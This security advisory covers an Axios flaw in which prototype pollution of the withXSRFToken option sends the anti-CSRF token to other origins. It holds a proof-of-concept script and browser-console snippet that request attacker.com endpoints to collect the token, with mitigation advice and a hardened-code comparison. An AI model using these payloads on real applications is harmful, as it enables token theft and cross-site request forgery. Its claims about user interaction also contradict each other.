Axios, XSRF Token Cross-Origin Leakage via Prototype Pollution, CVE-TBD (Medium)


How the CVE Works (20 lines):

1. Axios uses the `withXSRFToken` config option to control whether the XSRF token is sent.
2. Expected boolean values: `true` (always send), `false` (never send), `undefined` (same-origin only).
3. The vulnerable code in `lib/helpers/resolveConfig.js:59` uses truthy/falsy coercion.
4. Condition: `if (withXSRFToken || (withXSRFToken !== false && isURLSameOrigin(...)))`.
5. Any truthy non-boolean value (e.g., `1`, `"false"`, `{}`, `[]`) makes the first clause true.
6. This short-circuits the `isURLSameOrigin()` check.
7. Attacker performs prototype pollution: `Object.prototype.withXSRFToken = 1`.
8. All Axios requests inherit the polluted property during config merge.
9. The browser reads the XSRF cookie (e.g., `XSRF-TOKEN`) and sends it as a header.
10. The header name is `X-XSRF-TOKEN` by default.
11. The token is now attached to every request, including cross-origin ones.
12. Attacker hosts `https://attacker.com/collect` and lures the victim.
13. The victim's browser makes an Axios request to the attacker's server.
14. The request includes `X-XSRF-TOKEN: secret-csrf-token`.
15. Attacker logs the token, enabling CSRF against the original app.
16. No user input is needed; pollution from any vulnerable dependency triggers it.
17. Affects all Axios versions since `withXSRFToken` was introduced.
18. Works only in browsers where `hasStandardBrowserEnv` is true.
19. Even a developer miswriting `withXSRFToken: "false"` (a string) causes the bug.
20. The fix requires strict boolean comparison instead of truthy coercion.

DailyCVE Form:

Platform: Axios library
Version: All versions
Vulnerability: XSRF token leakage
Severity: Medium
Date: 2026-04-15

Prediction: 2026-04-30

Analytics under What Undercode Say:

Check whether prototype pollution affects Axios (Node.js with jsdom):

    npm install axios jsdom

    // check.js -- run with: node check.js
    const { JSDOM } = require('jsdom');
    // Simulate a page served from the victim origin.
    const dom = new JSDOM('', { url: 'https://victim.com' });
    // Axios's standard-browser-environment check looks for both `window` and
    // `document`, so both are exposed as globals along with `navigator`.
    global.window = dom.window;
    global.document = dom.window.document;
    global.navigator = dom.window.navigator;
    // Pollute the prototype before axios is loaded and builds its config.
    Object.prototype.withXSRFToken = 1;
    const axios = require('axios');
    axios.get('https://attacker.com/collect').catch(e => console.log(e.message));

    // Browser console PoC (run on a page that has already loaded axios)
    Object.prototype.withXSRFToken = 1;
    // Plant a token in the cookie axios reads by default (XSRF-TOKEN).
    document.cookie = "XSRF-TOKEN=secret123";
    // Cross-origin request: with the pollution in place, X-XSRF-TOKEN is attached.
    axios.get('https://attacker.com/steal')
      .then(r => console.log('Token leaked'))
      .catch(e => console.log(e));

    Exploit:

Attacker injects `Object.prototype.withXSRFToken = 1` via a vulnerable dependency (e.g., an unsafe JSON parse or merge utility). The victim navigates to a page that makes any Axios request. All requests, even cross-origin ones, include the XSRF token in the `X-XSRF-TOKEN` header. The attacker hosts an endpoint that logs received headers, obtaining the token.

Protection from this CVE

– Upgrade to a patched Axios version (once available).
– Freeze `Object.prototype`: `Object.freeze(Object.prototype)`.
– Use `Object.create(null)` for config objects.
– Validate `withXSRFToken` with strict `=== true` or `=== false`.
– Avoid prototype-polluting patterns (e.g., `merge`, `clone` with unsafe keys).
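The following is an added example, not axios's own code and not the upstream patch. It models the condition quoted in the "How the CVE Works" list (truthy coercion of `withXSRFToken`) next to a strict-boolean version of the kind the protection advice asks for, and runs both under a temporarily polluted `Object.prototype` so the difference is visible. The `isURLSameOrigin` stand-in, the function names and the origins/URLs are all constructed for the example.

```javascript
// Added example, not axios's own code: models the decision made by the
// `withXSRFToken || (withXSRFToken !== false && isURLSameOrigin(...))`
// condition in a vulnerable and a strict-boolean form, and shows what each
// does under a polluted Object.prototype. Origins and URLs are constructed.

// Stand-in for axios's isURLSameOrigin: resolve the request URL against the
// page origin, as a browser would, and compare origins.
function isURLSameOrigin(requestUrl, pageOrigin) {
  return new URL(requestUrl, pageOrigin).origin === new URL(pageOrigin).origin;
}

// Vulnerable shape: truthy coercion. Any truthy value (1, "false", {}, [])
// short-circuits the same-origin check, and because the property is read
// with plain member access, an inherited (polluted) value counts as well.
function attachesTokenVulnerable(config, requestUrl, pageOrigin) {
  const withXSRFToken = config.withXSRFToken;
  return Boolean(withXSRFToken || (withXSRFToken !== false && isURLSameOrigin(requestUrl, pageOrigin)));
}

// Hardened shape (an assumed fix, not necessarily the upstream patch): only an
// own property is consulted, and only the booleans true and false are honoured;
// any other value falls back to the same-origin default.
function attachesTokenHardened(config, requestUrl, pageOrigin) {
  const withXSRFToken = Object.hasOwn(config, 'withXSRFToken') ? config.withXSRFToken : undefined;
  if (withXSRFToken === true) return true;
  if (withXSRFToken === false) return false;
  return isURLSameOrigin(requestUrl, pageOrigin);
}

// Runs fn while Object.prototype.withXSRFToken is set to `value`, then removes
// the pollution again so nothing else in the process is affected.
function withPollutedPrototype(value, fn) {
  Object.prototype.withXSRFToken = value;
  try {
    return fn();
  } finally {
    delete Object.prototype.withXSRFToken;
  }
}

const PAGE_ORIGIN = 'https://victim.example';               // constructed
const CROSS_ORIGIN_URL = 'https://attacker.example/collect'; // constructed
const SAME_ORIGIN_URL = '/api/profile';                      // constructed

// Each scenario returns [vulnerable result, hardened result].
function runScenarios() {
  const both = (config, url) => [
    attachesTokenVulnerable(config, url, PAGE_ORIGIN),
    attachesTokenHardened(config, url, PAGE_ORIGIN),
  ];
  return {
    // Baseline: with nothing set, both versions honour the same-origin default.
    cleanSameOrigin: both({}, SAME_ORIGIN_URL),
    cleanCrossOrigin: both({}, CROSS_ORIGIN_URL),
    // Developer mistake from the write-up: the string "false" is truthy.
    stringFalseCrossOrigin: both({ withXSRFToken: 'false' }, CROSS_ORIGIN_URL),
    // Pollution: the config object is empty, but inherits withXSRFToken = 1.
    pollutedCrossOrigin: withPollutedPrototype(1, () => both({}, CROSS_ORIGIN_URL)),
    // An explicit false is respected by both versions, even for same-origin calls.
    explicitFalseSameOrigin: both({ withXSRFToken: false }, SAME_ORIGIN_URL),
  };
}

// When run directly, prints the table; the vulnerable column reads `true` for
// the cross-origin cases where the hardened column reads `false`.
if (typeof require !== 'undefined' && require.main === module) {
  console.table(runScenarios());
}
```

The hardened version deliberately treats anything other than an own-property boolean as "not configured", which is what closes both paths described above: a polluted prototype never reaches the check, and a mistyped string falls back to the same-origin rule instead of forcing the header on.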

Impact:

  • Leakage of anti‑CSRF token to any attacker‑controlled origin.
  • Enables CSRF attacks (e.g., state‑changing actions) on the victim application.
  • Affects every Axios request in the application after a single pollution.
  • No session hijacking alone; requires secondary request forgery.
  • Medium severity due to required user interaction and limited confidentiality loss.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
